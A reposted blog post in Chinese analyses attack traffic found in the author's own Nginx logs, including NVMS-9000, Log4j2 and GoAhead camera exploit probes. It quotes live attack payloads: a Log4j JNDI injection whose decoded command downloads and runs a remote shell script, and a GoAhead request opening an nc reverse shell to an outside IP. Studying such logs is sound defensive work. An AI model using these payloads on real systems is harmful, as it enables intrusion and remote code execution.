devbox
AllinToyou
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Nginx日志分析竟挖掘出来自全世界的攻击_nginx 监控日志中fastjson,log4j访问

作者:AllinToyou | 2024-06-11 09:44:03

nginx 监控日志中fastjson,log4j访问

Nginx日志分析竟挖掘出来自全世界的攻击

引言

前些日子灵机一动去看了Nginx的日志,居然发现在正常的用户请求之外还有许多奇奇怪怪的请求,遂写了个python脚本将有记录的日志全部导入一个excel进行分析

关于脚本

主要功能:

  1. 用正则表达式逐行匹配解析默认格式的Nginx日志
  2. 对每个ip进行ip归属地调查
  3. 将结果导入Excel

代码放GitHub了,文末有需自取

Nginx日志格式

    #log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
    #                  '$status $body_bytes_sent "$http_referer" '
    #                  '"$http_user_agent" "$http_x_forwarded_for"';

    #access_log  logs/access.log  main;


  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

攻击挖掘

1.针对NVMS-9000摄像头RCE漏洞的扫描

万花丛中,我一眼就相中了ta。为什么呢?

使用admin凭证的最靓的仔
在这里插入图片描述ip归属地:安徽合肥
显然攻击者伪造了ua
由于我的Nginx是真实的项目而不是蜜罐,所以大小169的post body的内容就不得而知了
根据绿盟大佬的说法

使用base64管理员凭证(admin:{12213BD1-69C7-4862-843D-260500D1DA40})向/editBlackAndWhiteList路径发送SOAP格式的HTTP
POST请求,body中含有命令执行,尝试在摄像头上使用nc命令建立一个反向shell(通常针对物联网设备的漏洞探测,僵尸网络会直接投递样本,建立反向shell的攻击行为非常少见),将流量重定向到远程服务器的31337/TCP端口上

2.试图扫描rdp(远程桌面)

在这里插入图片描述这是rdp的服务指纹,完全一致:
在这里插入图片描述

3.试图扫描路由器或摄像头物联网设备的

一页都装不下
在这里插入图片描述

4.扫描代理的

在这里插入图片描述
他通过访问前两个来确定该代理能够访问国内网站
通过后几个国外搜索引擎、邪教网站、国外意识形态媒体rfa、梯子来确定该代理能访问外网
可惜我不是代理
ip属地:吉林省长春市电信 山东省济南市历城区电信

5.扫描log4j2漏洞

攻击来源:
143.244.150.80 美国 新泽西州 Hudson 运营商:DigitalOcean
nmap扫描该ip地址发现该服务器65536个端口中只开了22ssh控制端口和30287的一个需要账户密码验证的代理端口
因此无法确定是付费的代理服务器还是租用的云服务器亦或是对方控制的肉鸡
但可以确定的是服务器的安全措施很到位。。。
在这里插入图片描述
请求内容

/?id=t(%27 %7B %7Benv:BARFOO:-j%7Dndi %7Benv:BARFOO:-:%7D %7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//159.223.219.155:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE4NS4xMDEuMTM5LjIxNjoxOTY0L2FrdHVhbGlzaWVyZW4uc2ggLW8gYWt0dWFsaXNpZXJlbi5zaDsgd2dldCBodHRwOi8vMTg1LjEwMS4xMzkuMjE2OjE5NjQvYWt0dWFsaXNpZXJlbi5zaDsgY2htb2QgNzc3IGFrdHVhbGlzaWVyZW4uc2g7IHNoIGFrdHVhbGlzaWVyZW4uc2g7IHJtIC1yZiBha3R1YWxpc2llcmVuLnNoOyBybSAtcmYgYWt0dWFsaXNpZXJlbi5zaC4x%7D%27)

base64解密得

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; curl http://185.101.139.216:1964/aktualisieren.sh -o aktualisieren.sh; wget http://185.101.139.216:1964/aktualisieren.sh; chmod 777 aktualisieren.sh; sh aktualisieren.sh; rm -rf aktualisieren.sh; rm -rf aktualisieren.sh.1

分析对方的攻击指令发现159.223.219.155(美国 德克萨斯)和185.101.139.216(荷兰 阿姆斯特丹)两台服务器
经过扫描发现,185的服务器离线,159的服务器伪装为离线状态但实际在线并开启了远程桌面在这里插入图片描述
由于对面的安全措施做的太好我失去了进一步渗透它的动力,就这样吧。

6. 扫描GoAhead 摄像头漏洞的

/set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+179.43.146.102+1245±e+%2Fbin%2Fsh%29
/ftptest.cgi?loginuse=&loginpas=

看看大佬的解析:360社区
攻击直接来源和下发脚本的服务器是同一个:179.43.146.102(归属地:巴拿马)
尝试扫描了一下,离线。

7.(这个我不认识)

估计也是一个漏洞扫描
在这里插入图片描述

8.疑似网络空间搜索引擎的扫描

在这里插入图片描述

9.海康威视 IP 摄像机未经身份验证的命令注入攻击

在这里插入图片描述详情见:链接
ip属地:伯利兹
这家伙就这一个ip在两天内发了上百条一模一样的请求,而且伪造了ua

10.诡异的跨站请求

在这里插入图片描述
这操作我也没搞明白。请求来自阿里云服务器

总结

短短十几天内一个动态ip的非默认端口的Nginx服务就能收到这么多的扫描攻击,可见互联网公共空间之凶险,网络安全绝对是不容忽视的重要问题。

之前我只将ssh用fail2jail保护起来了,却忽视了其他服务,现在看来有必要讲各种web服务也保护起来了

日志解析用的脚本:
GitHub

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/AllinToyou/article/detail/702611
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号